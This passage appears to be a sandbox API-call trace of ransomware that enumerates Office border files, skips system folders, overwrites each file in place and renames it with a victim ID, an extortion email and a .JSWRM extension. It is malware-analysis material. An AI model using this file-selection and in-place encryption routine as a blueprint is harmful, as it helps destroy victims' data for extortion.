ftCreationTime.dwLowDateTime=0x1770252c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1770252c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1770252c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6b14, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="MSART15.BDR", cAlternateFileName="")) returned 1 [0129.137] lstrcmpiW (lpString1="MSART15.BDR", lpString2=".") returned 1 [0129.137] lstrcmpiW (lpString1="MSART15.BDR", lpString2="..") returned 1 [0129.137] lstrcmpiW (lpString1="MSART15.BDR", lpString2="...") returned 1 [0129.137] lstrcmpiW (lpString1="MSART15.BDR", lpString2="windows") returned -1 [0129.137] lstrcmpiW (lpString1="MSART15.BDR", lpString2="recovery") returned -1 [0129.137] lstrcmpiW (lpString1="MSART15.BDR", lpString2="perflogs") returned -1 [0129.137] lstrcmpiW (lpString1="MSART15.BDR", lpString2="documents and settings") returned 1 [0129.137] lstrcmpiW (lpString1="MSART15.BDR", lpString2="$RECYCLE.BIN") returned 1 [0129.137] lstrcmpiW (lpString1="MSART15.BDR", lpString2="system volume information") returned -1 [0129.137] lstrcmpiW (lpString1="MSART15.BDR", lpString2="msocache") returned -1 [0129.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0129.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART15.BDR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART15.BDR", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSART15.BDR", lpUsedDefaultChar=0x0) returned 11 [0129.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0129.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0129.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART15.BDR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART15.BDR", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSART15.BDR", lpUsedDefaultChar=0x0) returned 11 [0129.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0129.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0129.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0129.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0129.138] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART15.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart15.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0129.138] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=27412) returned 1 [0129.138] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6b10) returned 0x27b348 [0129.138] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x6b10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x6b10, lpOverlapped=0x0) returned 1 [0129.142] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.142] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x6b10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x6b10, lpOverlapped=0x0) returned 1 [0129.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0129.142] CloseHandle (hObject=0x238) returned 1 [0129.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0129.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0129.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0129.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0129.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0129.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0129.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0129.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0129.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0129.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0129.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0129.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0129.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0129.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0129.143] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART15.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart15.bdr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART15.BDR.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart15.bdr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0129.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0129.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0129.144] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1770252c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1770252c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1770252c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb854, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="MSART2.BDR", cAlternateFileName="")) returned 1 [0129.144] lstrcmpiW (lpString1="MSART2.BDR", lpString2=".") returned 1 [0129.144] lstrcmpiW (lpString1="MSART2.BDR", lpString2="..") returned 1 [0129.144] lstrcmpiW (lpString1="MSART2.BDR", lpString2="...") returned 1 [0129.144] lstrcmpiW (lpString1="MSART2.BDR", lpString2="windows") returned -1 [0129.144] lstrcmpiW (lpString1="MSART2.BDR", lpString2="recovery") returned -1 [0129.144] lstrcmpiW (lpString1="MSART2.BDR", lpString2="perflogs") returned -1 [0129.144] lstrcmpiW (lpString1="MSART2.BDR", lpString2="documents and settings") returned 1 [0129.144] lstrcmpiW (lpString1="MSART2.BDR", lpString2="$RECYCLE.BIN") returned 1 [0129.144] lstrcmpiW (lpString1="MSART2.BDR", lpString2="system volume information") returned -1 [0129.144] lstrcmpiW (lpString1="MSART2.BDR", lpString2="msocache") returned -1 [0129.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0129.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART2.BDR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART2.BDR", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSART2.BDR", lpUsedDefaultChar=0x0) returned 10 [0129.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0129.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0129.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART2.BDR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART2.BDR", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSART2.BDR", lpUsedDefaultChar=0x0) returned 10 [0129.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0129.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0129.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0129.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0129.144] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART2.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart2.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0129.145] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=47188) returned 1 [0129.145] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb850) returned 0x27b348 [0129.145] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xb850, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xb850, lpOverlapped=0x0) returned 1 [0129.149] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.149] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xb850, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xb850, lpOverlapped=0x0) returned 1 [0129.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0129.150] CloseHandle (hObject=0x238) returned 1 [0129.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0129.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0129.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0129.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0129.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0129.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0129.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0129.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0129.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0129.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0129.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0129.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0129.150] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART2.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart2.bdr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART2.BDR.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart2.bdr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.151] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1770252c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1770252c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x17728794, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe12e, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="MSART3.BDR", cAlternateFileName="")) returned 1 [0129.151] lstrcmpiW (lpString1="MSART3.BDR", lpString2=".") returned 1 [0129.151] lstrcmpiW (lpString1="MSART3.BDR", lpString2="..") returned 1 [0129.151] lstrcmpiW (lpString1="MSART3.BDR", lpString2="...") returned 1 [0129.151] lstrcmpiW (lpString1="MSART3.BDR", lpString2="windows") returned -1 [0129.151] lstrcmpiW (lpString1="MSART3.BDR", lpString2="recovery") returned -1 [0129.151] lstrcmpiW (lpString1="MSART3.BDR", lpString2="perflogs") returned -1 [0129.151] lstrcmpiW (lpString1="MSART3.BDR", lpString2="documents and settings") returned 1 [0129.151] lstrcmpiW (lpString1="MSART3.BDR", lpString2="$RECYCLE.BIN") returned 1 [0129.151] lstrcmpiW (lpString1="MSART3.BDR", lpString2="system volume information") returned -1 [0129.151] lstrcmpiW (lpString1="MSART3.BDR", lpString2="msocache") returned -1 [0129.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART3.BDR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART3.BDR", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSART3.BDR", lpUsedDefaultChar=0x0) returned 10 [0129.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART3.BDR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART3.BDR", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSART3.BDR", lpUsedDefaultChar=0x0) returned 10 [0129.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.152] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART3.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart3.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0129.152] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=57646) returned 1 [0129.152] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.152] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xe120, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xe120, lpOverlapped=0x0) returned 1 [0129.157] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.157] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xe120, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xe120, lpOverlapped=0x0) returned 1 [0129.158] CloseHandle (hObject=0x238) returned 1 [0129.158] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART3.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart3.bdr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART3.BDR.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart3.bdr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.159] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1770252c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1770252c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x17728794, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3902, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="MSART4.BDR", cAlternateFileName="")) returned 1 [0129.159] lstrcmpiW (lpString1="MSART4.BDR", lpString2=".") returned 1 [0129.159] lstrcmpiW (lpString1="MSART4.BDR", lpString2="..") returned 1 [0129.159] lstrcmpiW (lpString1="MSART4.BDR", lpString2="...") returned 1 [0129.159] lstrcmpiW (lpString1="MSART4.BDR", lpString2="windows") returned -1 [0129.159] lstrcmpiW (lpString1="MSART4.BDR", lpString2="recovery") returned -1 [0129.159] lstrcmpiW (lpString1="MSART4.BDR", lpString2="perflogs") returned -1 [0129.159] lstrcmpiW (lpString1="MSART4.BDR", lpString2="documents and settings") returned 1 [0129.159] lstrcmpiW (lpString1="MSART4.BDR", lpString2="$RECYCLE.BIN") returned 1 [0129.159] lstrcmpiW (lpString1="MSART4.BDR", lpString2="system volume information") returned -1 [0129.159] lstrcmpiW (lpString1="MSART4.BDR", lpString2="msocache") returned -1 [0129.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART4.BDR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART4.BDR", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSART4.BDR", lpUsedDefaultChar=0x0) returned 10 [0129.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART4.BDR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART4.BDR", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSART4.BDR", lpUsedDefaultChar=0x0) returned 10 [0129.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.159] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART4.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart4.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0129.160] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14594) returned 1 [0129.160] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.160] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x3900, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x3900, lpOverlapped=0x0) returned 1 [0129.162] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.162] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x3900, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x3900, lpOverlapped=0x0) returned 1 [0129.162] CloseHandle (hObject=0x238) returned 1 [0129.162] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART4.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart4.bdr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART4.BDR.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart4.bdr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.163] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x17774bfd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x17774bfd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1780d5ad, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3dac, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="MSART5.BDR", cAlternateFileName="")) returned 1 [0129.163] lstrcmpiW (lpString1="MSART5.BDR", lpString2=".") returned 1 [0129.163] lstrcmpiW (lpString1="MSART5.BDR", lpString2="..") returned 1 [0129.163] lstrcmpiW (lpString1="MSART5.BDR", lpString2="...") returned 1 [0129.163] lstrcmpiW (lpString1="MSART5.BDR", lpString2="windows") returned -1 [0129.163] lstrcmpiW (lpString1="MSART5.BDR", lpString2="recovery") returned -1 [0129.163] lstrcmpiW (lpString1="MSART5.BDR", lpString2="perflogs") returned -1 [0129.163] lstrcmpiW (lpString1="MSART5.BDR", lpString2="documents and settings") returned 1 [0129.163] lstrcmpiW (lpString1="MSART5.BDR", lpString2="$RECYCLE.BIN") returned 1 [0129.163] lstrcmpiW (lpString1="MSART5.BDR", lpString2="system volume information") returned -1 [0129.163] lstrcmpiW (lpString1="MSART5.BDR", lpString2="msocache") returned -1 [0129.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART5.BDR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, 